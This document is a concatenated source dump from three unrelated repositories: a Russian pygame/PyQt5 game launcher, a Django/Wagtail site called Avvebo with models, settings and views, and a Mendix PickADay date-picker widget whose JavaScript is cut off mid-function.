def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y, "Сюрикены", damage=8, speed_attack=10, bullet=StdBullets.Shuriken,
energy_requirement=2)
self.set_image(gamespace.game.load_image("weapon\\shuriken.png", -1))
class WeaponPistol(Weapon):
# Пистолет
def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y, "Пистолет", damage=35, speed_attack=3, bullet=StdBullets.RedBall,
energy_requirement=5)
self.set_image(gamespace.game.load_image("weapon\\pistol.png", -1))
all_weapons = [WeaponStaff, WeaponShuriken, WeaponPistol] # Всё оружие
class HeavyArmor(Item):
# Тяжёлая броня
def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y)
self.type_item = "armor"
self.armor = 600
self.sprint_speed = -2.5
self.set_image(gamespace.game.load_image("armor\\heavy armor.png", -1))
class MediumArmor(Item):
# Средняя броня
def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y)
self.type_item = "armor"
self.armor = 350
self.sprint_speed = -1.5
self.set_image(gamespace.game.load_image("armor\\medium armor.png", -1))
class LightArmor(Item):
# Лёгкая броня
def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y)
self.type_item = "armor"
self.armor = 100
self.sprint_speed = 0.5
self.set_image(gamespace.game.load_image("armor\\light armor.png", -1))
all_armors = [HeavyArmor, MediumArmor, LightArmor] # Вся броня
all_items = all_weapons + all_armors # Все предметы
class StdBullets:
"""Стандартные снаряды"""
class BlueBall(Bullet):
# Синий шар
def __init__(self, gamespace, sender, pos_finish, damage):
super().__init__(gamespace, sender, pos_finish, damage, 3)
default_image = pygame.Surface(size=[gamespace.size_cell // 4] * 2)
default_image.fill(pygame.color.Color("red"))
self.image = default_image
self.rect = self.image.get_rect().move(
sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_image(gamespace.game.load_image("bullet\\blue ball.png", -1))
class Shuriken(Bullet):
# Сюрикен
def __init__(self, gamespace, sender, pos_finish, damage):
super().__init__(gamespace, sender, pos_finish, damage, 6)
default_image = pygame.Surface(size=[gamespace.size_cell // 6] * 2)
default_image.fill(pygame.color.Color("red"))
self.image = default_image
self.rect = self.image.get_rect().move(
sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_image(gamespace.game.load_image("bullet\\shuriken.png", -1))
class RedBall(Bullet):
# Красный шар
def __init__(self, gamespace, sender, pos_finish, damage):
super().__init__(gamespace, sender, pos_finish, damage, 10)
default_image = pygame.Surface(size=[gamespace.size_cell // 8] * 2)
default_image.fill(pygame.color.Color("red"))
self.image = default_image
self.rect = self.image.get_rect().move(
sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_image(gamespace.game.load_image("bullet\\red ball.png", -1))
all_bullets = [BlueBall, Shuriken, RedBall] # Все снаряды
if __name__ == '__main__':
ex = GameExample()
ex.mainloop()
<file_sep>/run.sh
python "Game Launcher.py"<file_sep>/SettingsForm.py
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'SettingsForm.ui'
#
# Created by: PyQt5 UI code generator 5.13.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(640, 360)
MainWindow.setMinimumSize(QtCore.QSize(640, 360))
MainWindow.setMaximumSize(QtCore.QSize(640, 360))
MainWindow.setWindowOpacity(1.0)
self.background_image = QtWidgets.QLabel(MainWindow)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 0, 621, 261))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayoutSettings = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayoutSettings.setContentsMargins(0, 0, 0, 0)
self.gridLayoutSettings.setObjectName("gridLayoutSettings")
self.label_packege = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_packege.setObjectName("label_packege")
self.gridLayoutSettings.addWidget(self.label_packege, 3, 0, 1, 1)
self.label_matrix = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_matrix.setObjectName("label_matrix")
self.gridLayoutSettings.addWidget(self.label_matrix, 1, 0, 1, 1)
self.label_music = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_music.setObjectName("label_music")
self.gridLayoutSettings.addWidget(self.label_music, 0, 0, 1, 1)
self.comboBoxPackages = QtWidgets.QComboBox(self.gridLayoutWidget)
self.comboBoxPackages.setObjectName("comboBoxPackages")
self.gridLayoutSettings.addWidget(self.comboBoxPackages, 3, 1, 1, 1)
self.slider_volume_music = QtWidgets.QSlider(self.gridLayoutWidget)
self.slider_volume_music.setMaximum(100)
self.slider_volume_music.setOrientation(QtCore.Qt.Horizontal)
self.slider_volume_music.setObjectName("slider_volume_music")
self.gridLayoutSettings.addWidget(self.slider_volume_music, 0, 1, 1, 1)
self.comboBoxMatrix = QtWidgets.QComboBox(self.gridLayoutWidget)
self.comboBoxMatrix.setObjectName("comboBoxMatrix")
self.gridLayoutSettings.addWidget(self.comboBoxMatrix, 1, 1, 1, 1)
self.checkBoxFullScreen = QtWidgets.QCheckBox(self.gridLayoutWidget)
self.checkBoxFullScreen.setText("")
self.checkBoxFullScreen.setObjectName("checkBoxFullScreen")
self.gridLayoutSettings.addWidget(self.checkBoxFullScreen, 2, 1, 1, 1)
self.label_fullscreen = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_fullscreen.setObjectName("label_fullscreen")
self.gridLayoutSettings.addWidget(self.label_fullscreen, 2, 0, 1, 1)
self.horizontalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(450, 280, 181, 31))
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayoutSaveCancel = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayoutSaveCancel.setContentsMargins(0, 0, 0, 0)
self.horizontalLayoutSaveCancel.setObjectName("horizontalLayoutSaveCancel")
self.btn_save = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.btn_save.setObjectName("btn_save")
self.horizontalLayoutSaveCancel.addWidget(self.btn_save)
self.btn_cancel = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.btn_cancel.setObjectName("btn_cancel")
self.horizontalLayoutSaveCancel.addWidget(self.btn_cancel)
self.btn_play = QtWidgets.QPushButton("Играть", MainWindow)
self.btn_play.move(500, 220)
self.btn_open_settings = QtWidgets.QPushButton("Настройки", MainWindow)
self.btn_open_settings.move(500, 260)
self.btn_close = QtWidgets.QPushButton("Выйти", MainWindow)
self.btn_close.move(500, 300)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Game Launcher \"Underground of Knights\""))
self.label_packege.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Набор уровней</span></p></body></html>"))
self.label_matrix.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Разрешение экрана</span></p></body></html>"))
self.label_music.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Музыка .o0</span></p></body></html>"))
self.label_fullscreen.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Полноэкранный режим</span></p></body></html>"))
self.btn_save.setText(_translate("MainWindow", "сохранить"))
self.btn_cancel.setText(_translate("MainWindow", "отмена"))
self.btn_play.setText(_translate("MainWindow", "Играть"))
self.btn_close.setText(_translate("MainWindow", "Выйти"))
self.btn_open_settings.setText(_translate("MainWindow", "Настройки"))<file_sep>/Game Launcher.py
import sys
import os
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtGui import QPixmap
from SettingsForm import Ui_MainWindow
from win32api import GetSystemMetrics
import run
class SettingsWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
"""Инициализация"""
super().__init__()
self.setupUi(self) # Загрузка формы
# Поключение кнопок к их функциям
self.btn_save.clicked.connect(self.save) # Сохранить
self.btn_cancel.clicked.connect(self.open_main_menu) # Отмена
self.btn_play.clicked.connect(self.play) # Играть
self.btn_open_settings.clicked.connect(self.open_settings) # Настройки
self.btn_close.clicked.connect(self.close) # Выйти
# Установка фона
self.background_image.setPixmap(QPixmap("data\images\\background menu.png").scaled(self.size()))
self.background_image.resize(self.size())
# Открытие главного меню
self.open_main_menu()
def play(self):
"""Запускает игру"""
self.hide()
run.GameExample().mainloop()
def open_main_menu(self):
"""Открывает главное меню"""
# Сокрытие виджетов настроек
for row in range(self.gridLayoutSettings.rowCount()):
for col in range(self.gridLayoutSettings.columnCount()):
elem = self.gridLayoutSettings.itemAtPosition(row, col)
elem.widget().hide() if elem is not None else None
self.btn_save.hide()
self.btn_cancel.hide()
# Показ виджетов главного меню
self.btn_play.show()
self.btn_open_settings.show()
self.btn_close.show()
def open_settings(self):
"""Открывает меню настроек"""
self.load_settings() # Загрузка актуальных настроек из файла settings data
# Показ виджетов настроек
for row in range(self.gridLayoutSettings.rowCount()):
for col in range(self.gridLayoutSettings.columnCount()):
elem = self.gridLayoutSettings.itemAtPosition(row, col)
elem.widget().show() if elem is not None else None
self.btn_save.show()
self.btn_cancel.show()
# Сокрытие виджетов главного меню
self.btn_play.hide()
self.btn_open_settings.hide()
self.btn_close.hide()
def load_settings(self):
"""Загрузка актуальных настроек из главного меню"""
try:
# Если есть раннее созданный файл то программа загрузид данные из него
with open('data\settings data', encoding='utf8') as file:
data = file.readlines()
except FileNotFoundError:
# Иначе сама сгенерирует настройки
data = [f'matrix 640x360', 'fullscreen true', 'volume 0.5', 'package std']
finally:
# Загрузка доступных пакетов уровней
packages = list(filter(lambda x: os.path.isdir(f'data/levels/{x}'), os.listdir('data/levels')))
# Очистка старых данных и занесение новых в соответствующий comboBox
self.comboBoxPackages.clear()
for package in packages:
self.comboBoxPackages.addItem(package)
# Загрузка допустимых разрешений экрана
matrixs = ["7680x4320", "5120x2880", "3200x1800", "1920x1080", "1280x720", "640x360"]
matrixs = list(filter(lambda x: int(x.split('x')[0]) <= GetSystemMetrics(0) and
int(x.split('x')[1]) <= GetSystemMetrics(1), matrixs))
# Очистка старых данных и занесение новых в соответствующий comboBox
self.comboBoxMatrix.clear()
for matrix in matrixs:
self.comboBoxMatrix.addItem(matrix)
# Обновление актуальных настроек
for line in data:
key, val = line.split()
if key == 'matrix': # Разрешение
self.comboBoxMatrix.setCurrentIndex(matrixs.index(val)) if val in matrixs else None
if key == 'fullscreen': # Полноэкранный режим
val = val == 'true'
self.checkBoxFullScreen.setChecked(val)
elif key == 'volume': # Громкость
self.slider_volume_music.setValue(int(float(val) * 100))
elif key == 'package': # Пакет уровней
self.comboBoxPackages.setCurrentIndex(packages.index(val)) if val in packages else None
def save(self):
"""Сохранение новых настроек и переход в главное меню"""
with open('data\settings data', encoding='utf8', mode='w') as file:
file.write(f'matrix {self.comboBoxMatrix.currentText()}\n')
file.write(f'fullscreen {"true" if self.checkBoxFullScreen.isChecked() else "false"}\n')
file.write(f'volume {self.slider_volume_music.value() / 100}\n')
file.write(f'package {self.comboBoxPackages.currentText()}')
self.open_main_menu()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = SettingsWindow()
ex.show()
app.exec_()
| 6e257335f5b6c1e4e59318c197ba4b40dca76509 | [
"Markdown",
"Python",
"Shell"
] | 5 | Markdown | Permyak-Logy/Underground-of-Knights | 18187a56fda1c0416115789bdf0c37696ae6732e | 74db46d84751767613016d14c7599cb405f80bee |
refs/heads/master | <repo_name>gmar1274/Avvebo<file_sep>/src/Avvebo/website/admin.py
from django.contrib import admin
import Avvebo.website.models as mods
# Register your models here.
myModels=[mods.User,mods.Venue,mods.SocialMedia,mods.TalentContent,mods.AvveboProfile]
admin.site.register(myModels)
<file_sep>/src/Avvebo/settings.py
"""
Django settings for Avvebo project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from django.conf.global_settings import AUTH_USER_MODEL, EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD, EMAIL_PORT, EMAIL_USE_SSL,\
EMAIL_USE_TLS
#from Avvebo.website.models import User
#from Avvebo.website.models import AvveboProfile
EMAIL_HOST_USER='<EMAIL>'
EMAIL_HOST_PASSWORD=''
EMAIL_HOST ='smtp-mail.outlook.com'
EMAIL_PORT=25
EMAIL_USE_TLS=True
EMAIL_USE_SSL=False
WAGTAIL_SITE_NAME = 'Avvebo'
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
#AUTH
#AUTH_PROFILE_MODULE = 'Avvebo.website.models.AvveboProfile'
#AUTH_USER_MODEL = 'Avvebo.website.models.User'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
#BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#STATIC_ROOT = os.path.join(BASE_DIR, "static")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
#MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
#STATIC_ROOT = os.path.join(DATA_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'website', 'static'),
)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admindocs',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Avvebo.website',
'wagtail.contrib.forms',
'wagtail.contrib.redirects',
'wagtail.embeds',
'wagtail.sites',
'wagtail.users',
'wagtail.snippets',
'wagtail.documents',
'wagtail.images',
'wagtail.search',
'wagtail.admin',
'wagtail.core',
'modelcluster',
'taggit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.cache.CacheMiddleware',
'django.contrib.admindocs.middleware.XViewMiddleware',
'wagtail.core.middleware.SiteMiddleware',
'wagtail.contrib.redirects.middleware.RedirectMiddleware',
]
ROOT_URLCONF = 'Avvebo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'website', 'templates'),
os.path.join(BASE_DIR, 'Avvebo','website', 'templates', 'colorlib'),#this works
os.path.join(BASE_DIR, 'Avvebo','website', 'mytemplates'),
os.path.join(BASE_DIR, 'Avvebo','website', 'templates', 'startbootstrapadmin'),#this works
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Avvebo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#CACHE_BACKEND='db://my_cache_table'
#MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
<file_sep>/src/Avvebo/website/models.py
from django.db import models
from django.contrib.auth.models import User as DjangoUser
# makemigrations
# then migrate
# Create your models here.
class AvveboProfile(models.Model):
user = models.ForeignKey(DjangoUser,on_delete=models.CASCADE)
class User(models.Model):
name = models.CharField(max_length=50)
username = models.CharField(max_length=50, primary_key=True)
reward_points = models.IntegerField(default=0)
member_since = models.DateField(auto_now_add=True)
id = models.CharField(max_length=50, unique=True, null=False) # api_id string
pic_url = models.CharField(max_length=50)
isTalent = models.BooleanField(default=False)
isActive = models.BooleanField(default=False)
def __str__(self): # __unicode__ on Python 2
return self.id
class SocialMedia(models.Model):
talent = models.ForeignKey(User, on_delete=models.CASCADE)
url = models.CharField(max_length=80)
def __str__(self):
return self.talent
class TalentContent(models.Model):
talent = models.ForeignKey(User, on_delete=models.CASCADE)
video_url = models.CharField(max_length=50)
date_uploaded = models.DateField(auto_now_add=True)
def __str__(self):
return self.video_url
class Venue(models.Model):
id = models.CharField(max_length=50, primary_key=True)
member_since = models.DateField(auto_now_add=True)
name = models.CharField(max_length=50)
def __str__(self):
return self.id
<file_sep>/src/Avvebo/website/migrations/0001_initial.py
# Generated by Django 2.1.5 on 2019-01-16 00:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='SocialMedia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.CharField(max_length=80)),
],
),
migrations.CreateModel(
name='TalentContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('video_url', models.CharField(max_length=50)),
('date_uploaded', models.DateField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('name', models.CharField(max_length=50)),
('username', models.CharField(max_length=50, primary_key=True, serialize=False)),
('reward_points', models.IntegerField(default=0)),
('member_since', models.DateField(auto_now_add=True)),
('id', models.CharField(max_length=50, unique=True)),
('pic_url', models.CharField(max_length=50)),
('isTalent', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Venue',
fields=[
('id', models.CharField(max_length=50, primary_key=True, serialize=False)),
('member_since', models.DateField(auto_now_add=True)),
('name', models.CharField(max_length=50)),
],
),
migrations.AddField(
model_name='talentcontent',
name='talent',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.User'),
),
migrations.AddField(
model_name='socialmedia',
name='talent',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.User'),
),
]
<file_sep>/src/Avvebo/website/views.py
from django.shortcuts import render
from django.forms import *
from django.conf import settings
from django.core.mail import BadHeaderError, send_mail
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib import messages
def index(request, context=None):
print("INDEXXXXXXXXXXX\n")
print("REQUEST:: {}".format(request))
if request.POST.get('from_email'): # got a post request from the contact_form
send_email_(request)#sends mail right now non async...
context={'email_just_sent':True}
return render(request=request,template_name='index.html',context=context)
def login(request):
print("HEREEEEEEEEEEEEEEEEEEEE")
return render(request,template_name='login.html')
'''
Custom controller that for urls.py.
'''
'''
def route(request,template, model=None, object_list=None,context=None):
#template=context['template']
#print('{}'.format(model.objects.all())) #works!.
#dict = {'object_list':object_list}
#context = RequestContext(request,dict)
if request.POST.get('from_email'): # got a post request from the contact_form
send_email(request)
context={'email_just_sent':True}
return render(request=request,template_name=template,context=context)
'''
def send_email(request):
'''
Default template to send an email
'''
msg = request.POST.get('message', '')
from_email = request.POST.get('from_email', '')
try:
send_mail('Avvebo Form Inquiry', msg, '<EMAIL>' , [from_email])
except BadHeaderError:
return HttpResponse('Invalid header found.')
#return route(request,'index.html', None, None,context=context) #HttpResponseRedirect('')#'/contact/thanks/')
| 2fcf2e18e695fb96f76f3cccfd95dc818e6b5502 | [
"Python"
] | 5 | Python | gmar1274/Avvebo | be77f0276b59d789fa64f733bb34b36517e9f233 | 05bfbe5a04b648feb80bd32c37f358d3dbdb0b0c |
refs/heads/master | <file_sep><?php
namespace Database\Seeders;
use App\Models\Answer;
use App\Models\User;
use App\Models\Question;
use Illuminate\Database\Seeder;
class DatabaseSeeder extends Seeder
{
/**
* Seed the application's database.
*
* @return void
*/
public function run()
{
User::factory(10)
->create()
->each(function ($user) {
Question::factory()
->count(rand(3, 10))
->for($user)
->create()
->each(function ($question) {
Answer::factory()
->count(rand(3, 10))
->for($question)
->create();
});
});
// If not randomized
// User::factory(10)
// ->hasQuestions(3)
// ->create();
// User::factory(3)
// ->create()
// ->each(function ($u) {
// $u->questions()
// ->saveMany(
// Question::factory(rand(1, 5))->make()
// )
// ->each(function ($q) {
// $q->answers()
// ->saveMany(Answer::factory(rand(1, 5))->make());
// });
// });
}
}
| 80d5162f1f2462e41e14e30fd5e740b4b286e2f5 | [
"PHP"
] | 1 | PHP | dhiyaaulauliyaa/laravel-qa | 946323a867931e350dc12c37d548fc8783e4478d | 113dc2b984ffca8aac1a5d4153184da579e57bc7 |
refs/heads/master | <repo_name>mendixlabs/PickADayWidget<file_sep>/README.md
# PickADayWidget
This is a date picker for Mendix. It add support for inline editing of a date (DOM-structure is different from the normal Mendix date picker)
## Contributing
For more information on contributing to this repository visit [Contributing to a GitHub repository](https://docs.mendix.com/howto50/contributing-to-a-github-repository).
## Dependencies
- [Pikaday](https://github.com/dbushell/Pikaday), modified version. MIT & BSD License.
- [Momentjs](momentjs.com) 2.17.1. MIT License
## Features
This is a Mendix implementation of the Pikaday library
## Configuration
### Data Source
#### Date Attribute
Attribute. Should be of type `DateTime`.
#### Date format
This is the date format that the widget uses (formatting comes from Moment.js). Note: this is different from the placeholder used in Appearance.
### Appearance
#### Show button
Show a button next to the text-field.
#### Button Class
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class name.
#### Placeholder
Placeholder text used in the input field.
#### Show days outside month
Show the days that are within a week but outside the current month.
#### Show label
Show a label in front of the input field.
#### Label text
Text for the label.
#### Prev month button
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class Name. If you leave this empty it will use the standard buttons that are defined in the CSS file.
#### Next month button
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class Name. If you leave this empty it will use the standard buttons that are defined in the CSS file.
### Behavior
##### On Change Microflow
The microflow to execute on when the value is changed.
##### Click outside month
Make dates outside the current month clickable.
##### Trigger on focus
Keep this on false if you are using a button. This will prevent unwanted opening of the calendar when the input field gets it's focus. This can be annoying when for example using an on change microflow.
##### Disable weekend days
Disable the selection of weekend days (Saturday and Sunday).
## License
This project is licensed under the Apache License v2 (for details, see the [LICENSE](LICENSE) file).
<file_sep>/src/PickADayWidget/widget/PickADayWidget.js
define([
"dojo/_base/declare",
"mxui/widget/_WidgetBase",
"mxui/dom",
"dojo/dom",
"dojo/dom-class",
"dojo/dom-style",
"dojo/dom-attr",
"dojo/dom-construct",
"dojo/_base/array",
"dojo/_base/lang",
"dojo/_base/event",
"dojo/on",
"dojo/html",
"PickADayWidget/lib/pikaday",
"PickADayWidget/lib/moment"
], function(declare, _WidgetBase, dom, dojoDom, dojoClass, dojoStyle, dojoAttr, dojoConstruct, dojoArray, lang, dojoEvent, dojoOn, dojoHtml, PickADay, moment) {
"use strict";
var $ = dojoConstruct.create;
return declare("PickADayWidget.widget.PickADayWidget", [_WidgetBase], {
// Nodes
_inputNode: null,
_calendarButton: false,
// Set in Modeler
dateAttr: "",
showButton: true,
buttonClass: "calendar",
dateFormat: "MM/DD/YYYY",
placeholderText: "MM/DD/YYYY",
showDaysOutsideMonth: true,
showLabel: false,
labelText: "",
onChangeMF: "",
clickOutsideMonth: true,
disableWeekend: false,
triggerFocus: false,
prevButtonClass: "minus",
nextButtonClass: "plus",
// Internal variables.
_picker: null,
_handles: null,
_contextObj: null,
_stayHidden: false,
constructor: function() {
this._handles = [];
},
postCreate: function() {
logger.debug(this.id + ".postCreate");
if (this.readOnly || this.get("disabled") || this.readonly) {
this._readOnly = true;
}
this.setNative = false; // TODO: After thorough testing, add this as an option to the modeler
this.calendarMode = "inline"; // TODO: Add modal option
dojoClass.add(this.domNode, "mx-dateinput pickaDay-widget form-group", true);
this._addElements();
this.own(dojoOn(this._inputNode, "focus", lang.hitch(this, this._onFocus)));
this.own(dojoOn(this._inputNode, "blur", lang.hitch(this, this._onBlur)));
this.own(dojoOn(this._inputNode, "change", lang.hitch(this, this._onChange)));
},
_onFocus: function () {
dojoAttr.set(this._inputNode, "type", this.setNative ? "date" : "text");
},
_onBlur: function () {
dojoAttr.set(this._inputNode, "type", "text");
},
_onChange: function (e) {
logger.debug(this.id + "._onChange");
},
_addElements: function () {
logger.debug(this.id + "._addElements");
var rootNode = this.domNode;
if (this.showLabel) {
$("label", {
class: "control-label",
innerHTML: this.labelText
}, this.domNode);
rootNode = $("div", {
class: "form-group"
}, this.domNode);
}
if (this.showButton) {
this._calendarButton = $("button", {
type: "button",
class: "btn mx-button mx-dateinput-select-button pickaDay-button"
}, rootNode);
$("span", {
class: "glyphicon glyphicon-" + this.buttonClass
}, this._calendarButton);
}
var wrapper = $("div", {
class: "mx-dateinput-input-wrapper"
}, rootNode);
this._inputNode = $("input", {
type: "text",
class: "form-control mx-dateinput-input",
placeHolder: this.placeholderText
}, wrapper);
var pickerWrapper = $("div", {
class: "pickerCalendar"
}, this.domNode);
if (!this._readOnly) {
this._picker = new PickADay({
field: this._inputNode,
trigger: this._calendarButton,
container: pickerWrapper,
onOpen: lang.hitch(this, this._onOpen),
onSelect : lang.hitch(this, this._onSelect),
onClose : lang.hitch(this, this._onClose),
onKey: lang.hitch(this, this._onKey),
triggerFocus: this.triggerFocus,
format: this.dateFormat,
showDaysInNextAndPreviousMonths: this.showDaysOutsideMonth,
clickOutsideMonth: this.clickOutsideMonth,
theme: "mendix-pickaday",
buttonPrev: this.prevButtonClass ? "<div class=\"glyphicon glyphicon-" + this.prevButtonClass + "\"></div>" : null,
buttonNext: this.nextButtonClass ? "<div class=\"glyphicon glyphicon-" + this.nextButtonClass + "\"></div>" : null,
disableWeekends: this.disableWeekend,
disableDayFn: function (day) {
return false;
}
});
this._picker.hide();
}
},
_onSelect: function (date) {
logger.debug(this.id + "._onSelect :: ", date);
if (date) {
this._contextObj.set(this.dateAttr, date);
if (this.onChangeMF) {
this._execMf(this.onChangeMF, this._contextObj.getGuid());
}
}
},
_onKey: function (e) {
// called when key is pressed and picker is visible
switch(e.keyCode){
case 13:
case 27:
e.preventDefault();
this._picker.hide();
break;
}
},
_onOpen: function () {
logger.debug(this.id + "._onOpen");
dojoClass.toggle(this.domNode, "open", true);
},
_onClose: function () {
logger.debug(this.id + "._onClose");
dojoClass.toggle(this.domNode, "open", false);
},
update: function(obj, callback) {
logger.debug(this.id + ".update");
this._contextObj = obj;
this._resetSubscriptions();
this._updateRendering(callback);
},
resize: function(box) {
logger.debug(this.id + ".resize");
},
uninitialize: function() {
logger.debug(this.id + ".uninitialize");
if (this._picker) {
this._picker.destroy();
}
},
_resetSubscriptions: function () {
logger.debug(this.id + "._resetSubscriptions");
this.unsubscribeAll();
if (this._contextObj) {
this.subscribe({
guid: this._contextObj.getGuid(),
callback: lang.hitch(this, function (guid) {
logger.debug(this.id + " Object subscription fired, guid: " + guid);
this._updateRendering();
})
});
this.subscribe({
guid: this._contextObj.getGuid(),
attr: this.dateAttr,
callback: lang.hitch(this, function (guid, attr, attrValue) {
logger.debug(this.id + " Attr subscription fired");
this._updateRendering();
})
});
this.subscribe({
guid: this._contextObj.getGuid(),
val: true,
callback: lang.hitch(this, function (validations) {
logger.debug(this.id + " Validation subscription fired");
this._handleValidation(validations, this.dateAttr);
})
});
}
},
// Handle validations.
_handleValidation: function (validations, attribute) {
logger.debug(this.id + "._handleValidation");
this._clearValidations();
var validation = validations[0],
message = validation.getReasonByAttribute(attribute);
if (this._readOnly) {
validation.removeAttribute(attribute);
} else if (message) {
this._addValidation(message);
validation.removeAttribute(attribute);
}
},
// Clear validations.
_clearValidations: function () {
logger.debug(this.id + "._clearValidations");
dojoConstruct.destroy(this._alertDiv);
